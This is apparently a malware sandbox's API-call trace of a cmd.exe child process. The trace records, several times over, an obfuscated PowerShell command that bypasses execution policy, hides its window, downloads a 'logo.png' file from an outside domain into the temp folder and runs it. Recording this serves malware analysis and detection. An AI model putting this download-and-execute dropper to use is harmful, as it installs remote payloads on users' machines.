	[0051.338] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x1eef80*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eef30 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x1eef30*(hProcess=0x54, hThread=0x50, dwProcessId=0x31c, dwThreadId=0x8e8)) returned 1
	[0051.341] CloseHandle (hObject=0x50) returned 1
	[0051.341] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0051.341] GetProcessHeap () returned 0x250000
	[0051.341] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26bb10 | out: hHeap=0x250000) returned 1
	[0051.341] GetEnvironmentStringsW () returned 0x26b8d0*
	[0051.341] GetProcessHeap () returned 0x250000
	[0051.341] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb2c) returned 0x26c820
	[0051.341] FreeEnvironmentStringsW (penv=0x26b8d0) returned 1
	[0051.341] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "5"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x16786000"
	os_pid = "0x848"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "2"
	os_parent_pid = "0xb58"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 49
	os_tid = 0x46c

	[0050.978] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13fb60 | out: lpSystemTimeAsFileTime=0x13fb60*(dwLowDateTime=0x97451ae0, dwHighDateTime=0x1d543d1)) 
	[0050.978] GetCurrentProcessId () returned 0x848
	[0050.978] GetCurrentThreadId () returned 0x46c
	[0050.978] GetTickCount () returned 0x1dc88
	[0050.978] QueryPerformanceCounter (in: lpPerformanceCount=0x13fb68 | out: lpPerformanceCount=0x13fb68*=17540425613) returned 1
	[0050.980] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0050.980] __set_app_type (_Type=0x1) 
	[0050.980] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0050.980] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0050.980] GetCurrentThreadId () returned 0x46c
	[0050.980] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x46c) returned 0x3c
	[0050.980] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0050.981] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0050.981] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0050.981] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0050.981] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x13faf8 | out: phkResult=0x13faf8*=0x0) returned 0x2
	[0050.981] VirtualQuery (in: lpAddress=0x13fae0, lpBuffer=0x13fa60, dwLength=0x30 | out: lpBuffer=0x13fa60*(BaseAddress=0x13f000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0050.981] VirtualQuery (in: lpAddress=0x40000, lpBuffer=0x13fa60, dwLength=0x30 | out: lpBuffer=0x13fa60*(BaseAddress=0x40000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0050.981] VirtualQuery (in: lpAddress=0x41000, lpBuffer=0x13fa60, dwLength=0x30 | out: lpBuffer=0x13fa60*(BaseAddress=0x41000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0050.981] VirtualQuery (in: lpAddress=0x44000, lpBuffer=0x13fa60, dwLength=0x30 | out: lpBuffer=0x13fa60*(BaseAddress=0x44000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0050.981] VirtualQuery (in: lpAddress=0x140000, lpBuffer=0x13fa60, dwLength=0x30 | out: lpBuffer=0x13fa60*(BaseAddress=0x140000, AllocationBase=0x140000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0050.981] GetConsoleOutputCP () returned 0x1b5
	[0050.981] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0050.982] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0050.982] _get_osfhandle (_FileHandle=1) returned 0x7
	[0050.982] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0050.982] _get_osfhandle (_FileHandle=1) returned 0x7
	[0050.982] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0050.982] _get_osfhandle (_FileHandle=1) returned 0x7
	[0050.982] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0050.982] _get_osfhandle (_FileHandle=0) returned 0x3
	[0050.982] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0050.983] _get_osfhandle (_FileHandle=0) returned 0x3
	[0050.983] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0050.983] GetEnvironmentStringsW () returned 0x348f20*
	[0050.983] GetProcessHeap () returned 0x330000
	[0050.983] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xad4) returned 0x349a00
	[0050.983] FreeEnvironmentStringsW (penv=0x348f20) returned 1
	[0050.983] GetProcessHeap () returned 0x330000
	[0050.983] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x8) returned 0x3487a0
	[0050.983] GetEnvironmentStringsW () returned 0x348f20*
	[0050.983] GetProcessHeap () returned 0x330000
	[0050.983] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xad4) returned 0x34a4e0
	[0050.983] FreeEnvironmentStringsW (penv=0x348f20) returned 1
	[0050.983] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x13e9b8 | out: phkResult=0x13e9b8*=0x44) returned 0x0
	[0050.983] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x0, lpData=0x13e9d0*=0x18, lpcbData=0x13e9b4*=0x1000) returned 0x2
	[0050.983] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x4, lpData=0x13e9d0*=0x1, lpcbData=0x13e9b4*=0x4) returned 0x0
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x0, lpData=0x13e9d0*=0x1, lpcbData=0x13e9b4*=0x1000) returned 0x2
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x4, lpData=0x13e9d0*=0x0, lpcbData=0x13e9b4*=0x4) returned 0x0
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x4, lpData=0x13e9d0*=0x40, lpcbData=0x13e9b4*=0x4) returned 0x0
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x4, lpData=0x13e9d0*=0x40, lpcbData=0x13e9b4*=0x4) returned 0x0
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x0, lpData=0x13e9d0*=0x40, lpcbData=0x13e9b4*=0x1000) returned 0x2
	[0050.984] RegCloseKey (hKey=0x44) returned 0x0
	[0050.984] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x13e9b8 | out: phkResult=0x13e9b8*=0x44) returned 0x0
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x0, lpData=0x13e9d0*=0x40, lpcbData=0x13e9b4*=0x1000) returned 0x2
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x4, lpData=0x13e9d0*=0x1, lpcbData=0x13e9b4*=0x4) returned 0x0
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x0, lpData=0x13e9d0*=0x1, lpcbData=0x13e9b4*=0x1000) returned 0x2
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x4, lpData=0x13e9d0*=0x0, lpcbData=0x13e9b4*=0x4) returned 0x0
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x4, lpData=0x13e9d0*=0x9, lpcbData=0x13e9b4*=0x4) returned 0x0
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x4, lpData=0x13e9d0*=0x9, lpcbData=0x13e9b4*=0x4) returned 0x0
	[0050.984] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x13e9b0, lpData=0x13e9d0, lpcbData=0x13e9b4*=0x1000 | out: lpType=0x13e9b0*=0x0, lpData=0x13e9d0*=0x9, lpcbData=0x13e9b4*=0x1000) returned 0x2
	[0050.984] RegCloseKey (hKey=0x44) returned 0x0
	[0050.984] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e42
	[0050.984] srand (_Seed=0x5d3b2e42) 
	[0050.984] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0050.984] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0050.984] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0050.985] GetProcessHeap () returned 0x330000
	[0050.985] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x218) returned 0x348f20
	[0050.985] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x348f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0050.985] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0050.985] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0050.985] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0050.985] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0050.985] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0050.985] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0050.985] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0050.985] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0050.985] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0050.985] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0050.985] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0050.985] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0050.985] GetProcessHeap () returned 0x330000
	[0050.985] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x349a00 | out: hHeap=0x330000) returned 1
	[0050.985] GetEnvironmentStringsW () returned 0x349140*
	[0050.985] GetProcessHeap () returned 0x330000
	[0050.985] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xaec) returned 0x34bad0
	[0050.986] FreeEnvironmentStringsW (penv=0x349140) returned 1
	[0050.986] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0050.986] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0050.986] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0050.986] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0050.986] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0050.986] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0050.986] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0050.986] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0050.986] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0050.986] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0050.986] GetProcessHeap () returned 0x330000
	[0050.986] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x48) returned 0x348d80
	[0050.986] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x13f7c0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0050.986] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x13f7c0, lpFilePart=0x13f7a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x13f7a0*="Documents") returned 0x1b
	[0050.986] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0050.986] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x13f4d0 | out: lpFindFileData=0x13f4d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x34c5d0
	[0050.986] FindClose (in: hFindFile=0x34c5d0 | out: hFindFile=0x34c5d0) returned 1
	[0050.986] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x13f4d0 | out: lpFindFileData=0x13f4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x34c5d0
	[0050.986] FindClose (in: hFindFile=0x34c5d0 | out: hFindFile=0x34c5d0) returned 1
	[0050.987] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x13f4d0 | out: lpFindFileData=0x13f4d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x34c5d0
	[0050.987] FindClose (in: hFindFile=0x34c5d0 | out: hFindFile=0x34c5d0) returned 1
	[0050.987] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0050.987] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0050.987] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0050.987] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0050.987] GetProcessHeap () returned 0x330000
	[0050.987] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34bad0 | out: hHeap=0x330000) returned 1
	[0050.987] GetEnvironmentStringsW () returned 0x34afd0*
	[0050.987] GetProcessHeap () returned 0x330000
	[0050.987] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb2c) returned 0x34bb10
	[0050.987] FreeEnvironmentStringsW (penv=0x34afd0) returned 1
	[0050.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0050.987] GetProcessHeap () returned 0x330000
	[0050.987] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x348d80 | out: hHeap=0x330000) returned 1
	[0050.987] GetProcessHeap () returned 0x330000
	[0050.987] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4016) returned 0x34c650
	[0050.988] GetProcessHeap () returned 0x330000
	[0050.988] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x260) returned 0x349c80
	[0050.988] GetProcessHeap () returned 0x330000
	[0050.988] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34c650 | out: hHeap=0x330000) returned 1
	[0050.988] GetConsoleOutputCP () returned 0x1b5
	[0051.166] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0051.167] GetUserDefaultLCID () returned 0x409
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x13f8d0, cchData=128 | out: lpLCData="0") returned 2
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x13f8d0, cchData=128 | out: lpLCData="0") returned 2
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x13f8d0, cchData=128 | out: lpLCData="1") returned 2
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0051.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0051.168] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0051.168] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0051.168] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0051.168] GetProcessHeap () returned 0x330000
	[0051.168] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x20c) returned 0x349f60
	[0051.168] GetConsoleTitleW (in: lpConsoleTitle=0x349f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0051.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0051.168] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0051.168] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0051.169] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0051.169] GetProcessHeap () returned 0x330000
	[0051.169] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4012) returned 0x34c650
	[0051.169] GetProcessHeap () returned 0x330000
	[0051.169] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4010) returned 0x350670
	[0051.169] GetProcessHeap () returned 0x330000
	[0051.169] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x1a) returned 0x3449a0
	[0051.169] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0051.169] GetProcessHeap () returned 0x330000
	[0051.169] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3449a0 | out: hHeap=0x330000) returned 1
	[0051.169] GetProcessHeap () returned 0x330000
	[0051.169] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x350670 | out: hHeap=0x330000) returned 1
	[0051.169] GetProcessHeap () returned 0x330000
	[0051.169] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4010) returned 0x350670
	[0051.169] GetProcessHeap () returned 0x330000
	[0051.169] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x1a) returned 0x3449a0
	[0051.169] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0051.169] GetProcessHeap () returned 0x330000
	[0051.169] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3449a0 | out: hHeap=0x330000) returned 1
	[0051.169] GetProcessHeap () returned 0x330000
	[0051.170] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x350670 | out: hHeap=0x330000) returned 1
	[0051.170] GetProcessHeap () returned 0x330000
	[0051.170] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34c650 | out: hHeap=0x330000) returned 1
	[0051.170] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0051.170] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0051.170] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0051.171] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0051.171] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0051.171] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0051.171] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0051.171] GetProcessHeap () returned 0x330000
	[0051.171] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0) returned 0x34a180
	[0051.171] GetProcessHeap () returned 0x330000
